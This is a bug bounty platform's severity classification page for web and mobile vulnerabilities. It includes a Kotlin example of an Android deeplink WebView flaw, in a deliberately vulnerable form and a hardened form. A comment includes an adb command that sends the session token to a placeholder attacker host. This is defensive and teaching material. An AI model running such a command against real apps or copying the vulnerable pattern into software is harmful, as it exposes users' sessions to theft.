> For the complete documentation index, see [llms.txt](https://docs.hackenproof.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://docs.hackenproof.com/bug-bounty/vulnerability-classification/web-and-mobile.md).

# Web & Mobile

We use the [Common Vulnerability Scoring System](https://www.first.org/cvss/user-guide) (CVSS) to rate the severity of reported vulnerabilities. The table below lists the issue classes we accept and the severity they typically receive; the final rating follows the demonstrated impact, which is why the same class (subdomain takeover, information leakage) appears at more than one level.

| **Severity**    | **Example Vulnerabilities**                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  |
| --------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| 🔴 **Critical** | <ul><li>Payments manipulation</li><li>SQL Injection (SQLi)</li><li>Remote Code Execution (RCE)</li><li>Business logic flaws causing loss of user funds or assets</li><li>Command Injection</li></ul>                                                                                                                                                                                                                                                                                                                                                                                                                                         |
| 🟠 **High**     | <ul><li>Subdomain takeover (on domains linked to wallets or sensitive assets)</li><li>Stored Cross-Site Scripting (XSS)</li><li>Server-Side Request Forgery (SSRF)</li><li>Leakage of sensitive user information affecting >15% of users</li><li>File Inclusion vulnerabilities</li><li><strong>Authentication Bypass:</strong> Full or partial bypass of login, session management, or auth tokens.</li><li><strong>Insecure Direct Object Reference (IDOR):</strong> Accessing another user's data or resources without authorization.</li><li><strong>Privilege Escalation:</strong> A regular user accessing or performing admin-only functions (rated Medium to High depending on the functions reached).</li></ul> |
| 🟡 **Medium**   | <ul><li>Reflected Cross-Site Scripting (XSS)</li><li>Subdomain takeover (non-wallet domains)</li><li>Two-Factor Authentication (2FA) Bypass</li><li>Leakage of sensitive user information affecting 3%–15% of users</li><li>Cross-Site Request Forgery (CSRF)</li><li>Misconfigured exported Android components (e.g., unvalidated deeplinks, WebView loading attacker-controlled URLs leading to session token leakage)</li></ul>                                                                                                                                                                                                           |
| 🟢 **Low**      | <ul><li>HTML Injection</li><li>Subdomain takeovers <strong>without business impact</strong> (e.g., over a third-party service without access to cookies, auth, or internal APIs).</li><li>No rate limiting on form submissions or public endpoints</li><li>Content Spoofing</li><li>Broken Link Hijacking</li></ul>                                                                                                                                                                                                                                                                                                                          |

Please review the [Out-of-Scope Vulnerabilities](/bug-bounty/vulnerability-classification/web-and-mobile/out-of-scope-bugs.md) before submitting.
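The Android item in the Medium row names a specific chain (exported component, unvalidated deeplink, WebView loading an attacker-controlled URL, session token leaked). The example below is added here to make that chain concrete; it is not HackenProof's code nor taken from any program in scope. The package name, the `app.example.com` / `attacker.example` hosts, the manifest entry and the `SessionStore` object are all placeholders assumed for the illustration. The first Activity is the vulnerable pattern; the second is the same handler with the destination validated before the WebView opens it.

```kotlin
package com.example.deeplink  // hypothetical package

import android.app.Activity
import android.net.Uri
import android.os.Bundle
import android.webkit.WebView

/*
 * Both activities are assumed to be declared in AndroidManifest.xml as exported
 * deeplink handlers (placeholder host):
 *
 *   <activity android:name=".DeepLinkActivity" android:exported="true">
 *     <intent-filter>
 *       <action android:name="android.intent.action.VIEW" />
 *       <category android:name="android.intent.category.DEFAULT" />
 *       <category android:name="android.intent.category.BROWSABLE" />
 *       <data android:scheme="https" android:host="app.example.com" android:path="/open" />
 *     </intent-filter>
 *   </activity>
 */

// Stand-in for the app's real token store; the value is constructed for this example.
object SessionStore {
    fun token(): String = "constructed-session-token"
}

// VULNERABLE: loads whatever URL the deeplink's "url" parameter names and attaches the
// session token to that request. Any app on the device, or a link tapped in a browser,
// can start the exported Activity:
//   adb shell am start -a android.intent.action.VIEW \
//     -d "https://app.example.com/open?url=https://attacker.example/collect"
// The Authorization header is sent to attacker.example along with the page request.
class DeepLinkActivity : Activity() {
    override fun onCreate(savedInstanceState: Bundle?) {
        super.onCreate(savedInstanceState)
        val webView = WebView(this)
        setContentView(webView)
        webView.settings.javaScriptEnabled = true

        val target = intent.data?.getQueryParameter("url") ?: run { finish(); return }
        webView.loadUrl(target, mapOf("Authorization" to "Bearer ${SessionStore.token()}"))
    }
}

// HARDENED: same deeplink, but the destination must be https and its host must match an
// explicit allowlist exactly before the WebView opens it with the token attached.
class SafeDeepLinkActivity : Activity() {
    companion object {
        private val ALLOWED_HOSTS = setOf("app.example.com", "help.example.com")
    }

    override fun onCreate(savedInstanceState: Bundle?) {
        super.onCreate(savedInstanceState)
        val target = intent.data?.getQueryParameter("url")?.let { Uri.parse(it) }
        if (target == null || !isTrustedDestination(target)) {
            // Reject outright; never fall back to loading the untrusted URL.
            finish()
            return
        }
        val webView = WebView(this)
        setContentView(webView)
        webView.settings.javaScriptEnabled = true
        webView.settings.allowFileAccess = false  // no file:// reads from inside the WebView
        webView.loadUrl(target.toString(), mapOf("Authorization" to "Bearer ${SessionStore.token()}"))
    }

    private fun isTrustedDestination(uri: Uri): Boolean {
        if (!uri.isHierarchical) return false                       // e.g. "javascript:" URIs are opaque
        if (!"https".equals(uri.scheme, ignoreCase = true)) return false
        if (uri.userInfo != null) return false                       // https://app.example.com@attacker.example/
        val host = uri.host ?: return false
        // Exact match only: host.endsWith("example.com") would also accept notexample.com.
        return host.lowercase() in ALLOWED_HOSTS
    }
}
```

When triaging a report of this shape, the question that moves it between levels is what actually reaches the attacker's origin: a token or cookie that grants an authenticated session puts it in the Medium row above, whereas a WebView that merely renders an arbitrary page with nothing sensitive attached is closer to the Low-impact cases. Reports should include the exact `am start` (or link) used and show the token arriving at the attacker-controlled host.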

